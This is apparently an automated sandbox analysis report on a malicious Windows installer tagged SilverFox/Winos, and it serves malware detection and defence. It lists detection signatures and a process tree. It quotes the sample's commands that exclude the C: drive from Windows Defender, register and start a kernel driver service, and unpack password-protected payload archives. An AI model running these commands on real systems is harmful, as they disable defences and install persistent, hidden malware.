Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
#U5b89#U88c5#U52a9#U624b_2.0.4.exe

Overview

General Information

Sample name:#U5b89#U88c5#U52a9#U624b_2.0.4.exe
renamed because original name is a hash value
Original sample name:_2.0.4.exe
Analysis ID:1579693
MD5:a32b45411fdacb8dc364e2ecc75f7c54
SHA1:a1d3298f2e0ec913d269c8e393ddf49f6cd8fdbc
SHA256:1f20c061d4c41e3e775e80d6aabf5f23d88fbf25923f5821e81b824ef1d1ee46
Tags:exeSilverFoxwinosuser-kafan_shengui
Infos:

Detection

Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to hide a thread from the debugger
Found driver which could be used to inject code into processes
Hides threads from debuggers
Loading BitLocker PowerShell Module
PE file contains section with special chars
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: New Kernel Driver Via SC.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • #U5b89#U88c5#U52a9#U624b_2.0.4.exe (PID: 7644 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe" MD5: A32B45411FDACB8DC364E2ECC75F7C54)
    • #U5b89#U88c5#U52a9#U624b_2.0.4.tmp (PID: 7660 cmdline: "C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp" /SL5="$20492,4753025,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe" MD5: 9902FA6D39184B87AED7D94A037912D8)
      • powershell.exe (PID: 7676 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 7864 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • #U5b89#U88c5#U52a9#U624b_2.0.4.exe (PID: 7952 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe" /VERYSILENT MD5: A32B45411FDACB8DC364E2ECC75F7C54)
        • #U5b89#U88c5#U52a9#U624b_2.0.4.tmp (PID: 7980 cmdline: "C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp" /SL5="$402A0,4753025,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe" /VERYSILENT MD5: 9902FA6D39184B87AED7D94A037912D8)
          • 7zr.exe (PID: 8060 cmdline: 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 8092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • 7zr.exe (PID: 8152 cmdline: 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 8160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 8060 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • sc.exe (PID: 8008 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
              • conhost.exe (PID: 8168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8028 cmdline: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8044 cmdline: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7332 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7388 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7372 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7428 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4484 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1720 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4268 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4080 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5932 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3340 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7696 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7636 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7444 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1832 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2484 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4476 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7648 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2588 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8120 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8044 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7204 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7064 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7408 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7432 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7772 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7836 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7700 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7712 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7400 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3164 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1508 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1216 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1420 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3064 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5004 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7692 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7452 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3760 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2756 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7828 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3584 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1832 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7916 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7668 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8076 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8080 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8112 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8108 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8172 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7224 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8180 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7312 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7720 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7800 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7708 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5016 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7384 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4592 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3164 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3608 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1028 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp" /SL5="$20492,4753025,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp, ParentProcessId: 7660, ParentProcessName: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7676, ProcessName: powershell.exe
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8028, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 8044, ProcessName: sc.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp" /SL5="$20492,4753025,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp, ParentProcessId: 7660, ParentProcessName: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7676, ProcessName: powershell.exe
Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8028, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 8044, ProcessName: sc.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp" /SL5="$20492,4753025,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp, ParentProcessId: 7660, ParentProcessName: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7676, ProcessName: powershell.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: C:\Program Files (x86)\Windows NT\hrsw.vbcVirustotal: Detection: 10%Perma Link
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exeVirustotal: Detection: 9%Perma Link
Source: Submited SampleIntegrated Neural Analysis Model: Matched 91.0% probability
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.1819516942.0000000003920000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.1819340678.0000000003720000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6C0BAEC0 FindFirstFileA,FindClose,FindClose,6_2_6C0BAEC0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00AD6868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,10_2_00AD6868
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00AD7496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,10_2_00AD7496
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.00000000044F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.00000000044F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.00000000044F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.00000000044F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.00000000044F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.00000000044F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.00000000044F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.00000000044F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.00000000044F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.00000000044F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
